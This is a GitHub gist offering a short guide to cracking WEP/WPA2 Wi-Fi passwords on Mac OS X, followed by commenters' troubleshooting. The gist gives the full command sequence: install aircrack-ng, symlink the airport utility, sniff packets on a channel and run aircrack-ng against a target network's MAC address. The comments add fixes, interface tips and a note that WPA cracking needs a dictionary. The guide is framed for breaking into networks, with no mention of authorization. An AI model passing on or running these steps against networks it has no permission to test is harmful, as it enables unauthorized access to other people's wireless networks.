Instantly share code, notes, and snippets.

Embed
What would you like to do?
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
//Install Macports.
//Install aircrack-ng:
sudo port install aircrack-ng
//Install the latest Xcode, with the Command Line Tools.
//Create the following symlink:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
//Figure out which channel you need to sniff:
sudo airport -s
sudo airport en1 sniff [CHANNEL]
//New Terminal Window
aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]
// Notes: the cap_file will be located in the /tmp/airportSniff*.cap.
@jQrgen

This comment has been minimized.

jQrgen commented Jan 12, 2017

Change symling to:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
ref: http://stackoverflow.com/questions/33223457/mac-osx-el-capitan-airport-sym-link-not-permitted

@rafahigueros

This comment has been minimized.

rafahigueros commented Jan 27, 2017

will this actually work with WPA networks? "-a 1" specifies for WEP, and WAP cracking requires dictionaries (-w option)

@qfq8wf77qwf8

This comment has been minimized.

qfq8wf77qwf8 commented Apr 2, 2017

What if you installed via brew?

@jwsi

This comment has been minimized.

jwsi commented Apr 17, 2017

brew install aircrack-ng

@immysam

This comment has been minimized.

immysam commented Jun 28, 2017

i didn't got access after step 10 i.e. 11 ,12 and 13 are not applicable
help me pls my mac is showing aircrack-ng command not found after step 12 aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]

@immysam

This comment has been minimized.

immysam commented Jun 28, 2017

help me pls anybody????

@ldelcampof

This comment has been minimized.

ldelcampof commented Jul 15, 2017

this commands help me @immysam

export PATH=$PATH:/opt/local/bin
export MANPATH=$MANPATH:/opt/local/share/man
export INFOPATH=$INFOPATH:/opt/local/share/info

@mfd

This comment has been minimized.

mfd commented Jul 25, 2017

@immysam check your network interface
$ networksetup listallhardwareports

@sonu628

This comment has been minimized.

sonu628 commented Jul 30, 2017

I am getting this
`
Attack failed. Possible reasons:

 * Out of luck: you must capture more IVs. Usually, 104-bit WEP
   can be cracked with about 80.000 IVs, sometimes more.

 * Try to raise the fudge factor (-f).

Please specify a dictionary (option -w).`

@simplenotezy

This comment has been minimized.

simplenotezy commented Oct 1, 2017

Running sudo airport en1 sniff 1 does not work. Simply displays the help message.

@unix-root

This comment has been minimized.

unix-root commented Oct 10, 2017

^ +1

@Emixam23

This comment has been minimized.

Emixam23 commented Oct 17, 2017

Why does it display the commands? I'm not sure to understand

@Emixam23

This comment has been minimized.

Emixam23 commented Oct 18, 2017

Guys maybe it's because de paramaters aren't correct?

@Emixam23

This comment has been minimized.

Emixam23 commented Oct 18, 2017

So stupid, I found why it happens.

Based on [THIS LINK], it seems like en1 is the interface of Wireless only when you have an ethernet port. On my MacBook Pro, I don't, so en0 is the only one I have !

sudo airport en0 sniff [CHANNEL]

Hopefully it helps !

@Gaaal

This comment has been minimized.

Gaaal commented Oct 21, 2017

How do I add a dictionary? Is Jack the Ripper good enough?

@cyberfunk

This comment has been minimized.

cyberfunk commented Oct 21, 2017

Hello how do I sniff with airport and use aircrack-ng using an Alfa AWUS036AC USB 3.0 adapter on a MacBook Pro? When I type ifconfig in Terminal my USB wifi adapter doesn't show up.

@hanhmr

This comment has been minimized.

hanhmr commented Oct 30, 2017

Dear admin,

How to see CAP_FILE? I have try to understand noted: the cap_file will be located in the /tmp/airportSniff*.cap. but don't know how to see them, pls help!

Thanks a lot

(aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]
// Notes: the cap_file will be located in the /tmp/airportSniff*.cap.

@VhaTer

This comment has been minimized.

VhaTer commented Dec 3, 2017

-i got a macbook air and guess i ask my self same thing how to do kali stuff natively on macos why im here

perhaps you already find this
1- http://jason4zhu.blogspot.fr/2014/12/crack-wep-wifi-via-aircrack-ng-in-mac-osx.html
2- https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html ( this article Link to your Notes Here ^^)

@RahulDhiman93

This comment has been minimized.

RahulDhiman93 commented Dec 14, 2017

symlink is not working
NO SUCH FILE OR DIRECTORY

@psyycopatart

This comment has been minimized.

psyycopatart commented Jan 7, 2018

It say : No valid WPA handshakes found.
What can i do ? :(

@jpacora

This comment has been minimized.

jpacora commented Jan 28, 2018

The command will be:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

@MrPeker

This comment has been minimized.

MrPeker commented Feb 1, 2018

airport command not found :/

@chezis45

This comment has been minimized.

chezis45 commented Feb 9, 2018

sudo su -
ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

Worked for me when I got airport command not found and operation not possible.

@weltmoasta

This comment has been minimized.

weltmoasta commented Feb 19, 2018

i cant find the Cap_File because i have no folder like tmp. can anyone help me pls?

@char543

This comment has been minimized.

char543 commented Feb 21, 2018

@weltmoasta navigate to /tmp in finder

@char543

This comment has been minimized.

char543 commented Feb 21, 2018

also make sure youre typing .cap and not .cap. (the extra dot is what threw me)

@AramSemerjyan

This comment has been minimized.

AramSemerjyan commented Mar 27, 2018

Mac has built in sniffer for getting handshakes, why airport is needed for that? Also I'm wondering is the aircrack mechanism based on getting handshakes and after try to recover password from hccapx with hashcat?

@iamsoorajsingh

This comment has been minimized.

iamsoorajsingh commented May 11, 2018

command not found

@chovy

This comment has been minimized.

chovy commented Jul 21, 2018

what is the target mac address?

@Eastkap

This comment has been minimized.

Eastkap commented Aug 12, 2018

mac address is the same as bssid @chovy

@Tetsu51718

This comment has been minimized.

Tetsu51718 commented Oct 8, 2018

can"t find [CAP_FILE]
pls help

@Tetsu51718

This comment has been minimized.

Tetsu51718 commented Oct 8, 2018

$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
ln: /usr/local/bin/airport: File exists
$ aircrack-ng -1 -a 1 -b
-bash: aircrack-ng: command not found
$ brew install aircrack-ng
Warning: aircrack-ng 1.4 is already installed, it's just not linked
You can use brew link aircrack-ng to link this version.
$ brew link aircrack-ng
Linking /usr/local/Cellar/aircrack-ng/1.4...
Error: Could not symlink sbin/airbase-ng
/usr/local/sbin is not writable.

what should do,, pls

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment